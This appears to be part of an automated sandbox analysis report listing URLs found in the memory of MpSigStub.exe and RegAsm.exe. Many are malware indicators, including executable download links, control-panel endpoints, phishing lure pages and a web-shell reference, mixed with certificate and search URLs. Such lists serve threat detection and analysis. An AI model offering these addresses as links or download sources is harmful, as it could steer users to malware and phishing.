Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://basti.ciseducation.org/website/images/prettyphoto/dark_square/.x1-unix/
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://batrasiaku.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://batysnewskz.kz/ups.com
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://bbc.lumpens.org/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://bbfitblogger.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://bbtbfr.pw/GetHPHost
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://bbtbfr.pw/ads/gad1.js
Source: MpSigStub.exe, 00000023.00000003.18282239876.0000015B1C55A000.00000004.00000001.sdmp String found in binary or memory: http://bcoolapp.com
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://bdsmforyoungs.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://beautifulmaori.co.nz/wp-content/plugins/wp-xmll_2/gorfy2pq/1ny0mnkih27id8m.ktk
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://beautybrief.com/c/gate.php
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://beef.smmovefilehost.com/pc/page/set_reg.php?afc=&cuid=
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://bellasimpson.com/
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://berita-mediasemasa.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://berita-tanahmelayu.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://berkah2013.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://beruijindegunhadesun.com/ktmcheck.exe
Source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp String found in binary or memory: http://best-search.us
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://best4hack.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://bestbsd.info/cd/cd.php?id=%s&ver=ig1
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: http://bestbsd.info/cd/cd.php?id=%s&ver=ig1http://rezultsd.info/cd/cd.php?id=%s&ver=ig1http://carren
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: http://bestbsd.info/cd/cd.php?id=ERROR&ver=ig1
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://bestnyaduit.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://bestofthebesttatoo.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://cloud-search.linkury.com
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://club.book.sina.com.cn/booksearch/booksearch.php?kw=%s
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp String found in binary or memory: http://clubdelaparrilla.cl/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://cn%d.evasi0n.com
Source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: http://cnr.org.br/ups-quantum-view
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: http://coastervilleregalos.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://cock4worship.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://coconut-pete.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://code.google.com/p/b374k-shell
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://coltaddict.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://community.derbiz.com/
Source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp String found in binary or memory: http://companieshouseonlinedownload.com/ox9.png
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://company.superweb.ws/view/note.exe
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://companyprivatedocumentservershub100000.braddocksrentals.com/commondocs/)
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://computerscience2.com/document-needed/
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://config.juezhao123.com/c.ashx?ver=&c=
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: http://connect.act-sat-bootcamp.com/dana/home.php
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://construtoramistral.com.br/
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://consumerinput.com/privacy
Source: MpSigStub.exe, 00000023.00000003.18311861284.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://contentedmerc.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=
Source: MpSigStub.exe, 00000023.00000003.18294597236.0000015B1A5CB000.00000004.00000001.sdmp String found in binary or memory: http://continuetosave.info/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://coolwalpaper.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://cooperjcw.xyz/bjsdke.exe
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://corplink.com.pk/wp-content/themes/buisson/16433.jpg
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: http://costacars.es/ico/ortodox.php
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://count.e-jok.cn/count.txt
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://count.key5188.com/vip/get.asp?mac=
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: http://countdutycall.info/1/
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: http://countexchange.com/config/line.gif
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: http://countrtds.ru/tdstrf/index.php
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://cpanel.asimsrl.com/ifk/cat.php
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp String found in binary or memory: http://cphepiwy.rebatesrule.net/8c40f5b1c5ba53fb.7tnlpjp5selle4?default
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: http://cpr-foundation.org/library/reportdhlnew.php
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://cpr-foundation.org/reportmaersknew.php
Source: MpSigStub.exe, 00000023.00000003.18299634028.0000015B1AF1A000.00000004.00000001.sdmp String found in binary or memory: http://cprvstd4upcomingtalentanimationauditnyc.duckdns.org/receipt/invoice_112229.doc
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: http://cpvfeed.mediatraffic.com/feed.php?ac=%s&kw=%s&url=%s&ip=%s&rfo=xml
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://cr-installer-fallback.s3-us-west-2.amazonaws.com/spd/shopp/sense9.exe_a
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://craghoppers.icu/Order.jpg
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: RegAsm.exe, 00000008.00000003.17610474541.00000000015BF000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://crl.defence.gov.au/pki0
Source: RegAsm.exe, 00000008.00000003.17610474541.00000000015BF000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: MpSigStub.exe, 00000023.00000003.18297885321.0000015B1B490000.00000004.00000001.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: MpSigStub.exe, 00000023.00000003.18350085117.0000015B1B6E3000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: MpSigStub.exe, 00000023.00000003.18350085117.0000015B1B6E3000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://crocus93.grey.ero0101.com/set_inf.php?id=ero257.wmv&cid=
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://crxupdate.pw/Crxx/background.js
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://crxupdate.pw/Crxx/flash.xpi
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://cs-skiluj.sanfre.eu/vmjz848148/
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://cs.zhongsou.com/
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://cscentralcard.com.br/colors/coffee/report-sfexpress.php
Source: RegAsm.exe, 00000008.00000002.21904829624.000000001E502000.00000004.00000001.sdmp String found in binary or memory: http://cselegance.com
Source: MpSigStub.exe, 00000023.00000003.18331238413.0000015B1AAC2000.00000004.00000001.sdmp String found in binary or memory: http://csgo-run.xyz/dl.exe
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://csjksco.com/initial/)
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp String found in binary or memory: http://csv.posadadesantiago.com/
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://cts.hotbar.com/
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://cts.hotbar.com/trackedevent.aspx
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://cupid.556677889900.com/
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://cvcviagens.sslblindado.com/documento.rtf
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://cvfanatic.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://cxdlk.esy.es/iej3d1/)
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://cydelink.com/zawww/
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://d.20apoaf.com/xuiow/
Source: MpSigStub.exe, 00000023.00000003.18327508493.0000015B1B6A0000.00000004.00000001.sdmp String found in binary or memory: http://d.ackng.com/
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://d.gameplaylabs.com/ce9237be57719933386c8a88b67bf7a5/install.xml?pid=
Source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp String found in binary or memory: http://d.robints.us/
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://d.sogou.com/music.so?query=%s
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://d.xmapps.net/i.php
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://d1.downxia.net/products/
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://d1hxtl9znqwejj.cloud
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://d2.3dprotect.net:90/update/?id=%d
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://d2hrpnfyb3wv3k.cloudfront.net
Source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp String found in binary or memory: http://d2xpmajse0mo96.cloudfront.net/app/ver/ssl.php
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://d4uk.7h4uk.com/w_case/login.php
Source: MpSigStub.exe, 00000023.00000003.18350843348.0000015B1B3CA000.00000004.00000001.sdmp String found in binary or memory: http://dafshare-org.eu.paccar.com
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://dailypictur.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://dailytop10tracker.com/important-please-read/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://danielflors.com/question/
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://darling4sil.5gbfree.com/companyprofile.zip
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: http://data1.yoou8.com/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://dataoffice.zapto.org
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: http://dec.ip3366.net/api/?key=20171119174239256&getnum=99999&proxytype=0
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://default.home
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: http://defaultincoming.mangospot.net/prf/reg.dot
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://delta-akb.ru/image/data/goods/dtm/.../log.php?f=404
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://deluvis.net/
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://demo.sabkura.com/overdue-payment/
Source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp String found in binary or memory: http://designte.com/shop?abc=cgdpzd04jni9oc4y
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://det-colors.ru/invoice-number-09203/
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://detayworx.com/_vsnpNgyXp84Os8Xh.php
Source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp String found in binary or memory: http://dev.northzone.it/ds/2312.gif
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://devee.emlnk.com/lt.php?s=b7abe8a8120881cc5c9dab6eac28ddbe&amp;i=1a3a1a
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: http://device-update.ddns.net
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: http://device-update.ddns.net-oupdate.exe
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp String found in binary or memory: http://df20.dot5hosting.com/~shitshir
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://dgdsgweewtew545435.tk
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://dhm-mhn.com/htamandela.hta
Source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp String found in binary or memory: http://dialers.netcollex.net/
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://dialin.bunm.de/
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://dialin.comonline.net/
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://dialin.dnibv.com/
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://dialup.carpediem.fr/perl/countdialupinter.pl?
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://dialup.carpediem.fr/perl/countdialupinter.pl?x
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://dialup.carpediem.fr/perl/dialup.pl
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: http://dialxs.nl
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: http://dialxs.nl/install/
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: http://dialxs.nl/install/cf
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://dickswingsgrill.com?
Source: MpSigStub.exe, 00000023.00000003.18331238413.0000015B1AAC2000.00000004.00000001.sdmp String found in binary or memory: http://dintandnesin.ru/april/view.php?id=
Source: MpSigStub.exe, 00000023.00000003.18339366931.0000015B1C174000.00000004.00000001.sdmp String found in binary or memory: http://directplugin.com/dialers/
Source: MpSigStub.exe, 00000023.00000003.18339366931.0000015B1C174000.00000004.00000001.sdmp String found in binary or memory: http://directplugin.com/dialers/x
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: http://discoverberts.com.au/dav//assets/checkapp1.php
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp String found in binary or memory: http://discovirtual.terra.com.br/vdmain.shtml
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: http://disk.karel
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: http://disk.karelia.pro/2adftYz/392.png
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: http://dist.checkin100.com/command?projectID=%s&affiliateID=%s&campaignID=%s&application=%s&v=9
Source: MpSigStub.exe, 00000023.00000003.18316847212.0000015B1B582000.00000004.00000001.sdmp String found in binary or memory: http://dl.%s/get/?pin=%s&lnd=%s
Source: MpSigStub.exe, 00000023.00000003.18293985930.0000015B1C0F1000.00000004.00000001.sdmp String found in binary or memory: http://dl.360safe.com/gf/360ini.cab
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://dl.dqwjnewkwefewamail.com/
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://dl.dropbox.com/
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://dl.dropbox.com/u/
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://dl.gencloudex.com/spd/shopp/sense9.exe_a
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://dl.gencloudex.com/spd/shopp/sense9.exe_ax
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://dl.pipi.cn/pipi_dae_
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: http://dl.static.iqiyi.com/hz/IQIYIsetup_senxing
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://dl.wizzuniquify.com/download/1/wizzuninstallmodule.exe
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: http://dld.baseflash.com/ProtectbaseflashSetup.exe
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: http://dld.baseflash.com/ProtectbaseflashSetup.exex
Source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp String found in binary or memory: http://dld.baseflash.com/dotnetfx
Source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp String found in binary or memory: http://dld.rewinup.com/dotnetfx
Source: MpSigStub.exe, 00000023.00000003.18311861284.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://dmww.dmcast.com/script/update.asp?version=%s
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://dmzeventsbali.com/images/usps/usps/label.htm
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://dns.cyberium.cc/script/
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: http://do.crionn.com/ola.php
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://docs.atu.ngr.mybluehost.me/
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: http://docs.atu.ngr.mybluehost.me/presentation.dllregsvr32
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://docs.herobo.com
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: http://doctor-antivirus.com/
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: http://doctor-antivirus.com/presalepage/
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: http://doctorantivirus2008a.com/support.php
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://dokument-9827323724423823.ru/KYSTBANEN.exe
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://dokument-9827323724423823.ru/Telefoncomputernes9.exe
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://dolfy.sedonahyperbarics.com:8080/keyboard_shortcut.js
Source: MpSigStub.exe, 00000023.00000003.18292431996.0000015B1BA3D000.00000004.00000001.sdmp String found in binary or memory: http://domainserver.co.kr
Source: MpSigStub.exe, 00000023.00000003.18293985930.0000015B1C0F1000.00000004.00000001.sdmp String found in binary or memory: http://down.anhuiry.com/
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://down.emoney.cn/wl
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://down.firmsoar.com/Fastaide_1160.exe
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: http://down.kuwo.cn/mbox/kuwo_jm634.exe
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: http://down.namepics.info/install.php?name=
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: http://down2.uc.cn/pcbrowser/down.php?pid=4396
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: http://download-n-save.com
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://download-the-files.com/tplc/cdc
Source: MpSigStub.exe, 00000023.00000003.18350289745.0000015B1B712000.00000004.00000001.sdmp String found in binary or memory: http://download.%s.com%s&u=%u&advid=00000000&p=%u
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://download.%s.com/
Source: MpSigStub.exe, 00000023.00000003.18300098662.0000015B1C3F4000.00000004.00000001.sdmp String found in binary or memory: http://download.%s.com/124.php?&advid=00000
Source: MpSigStub.exe, 00000023.00000003.18300098662.0000015B1C3F4000.00000004.00000001.sdmp String found in binary or memory: http://download.%s.com/madownload.php?&advid=00000000&u=%u&p=%u&lang=______
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://download.contextplus.net/shared/Msvcp60Installer.exe
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://download.cpudln.com
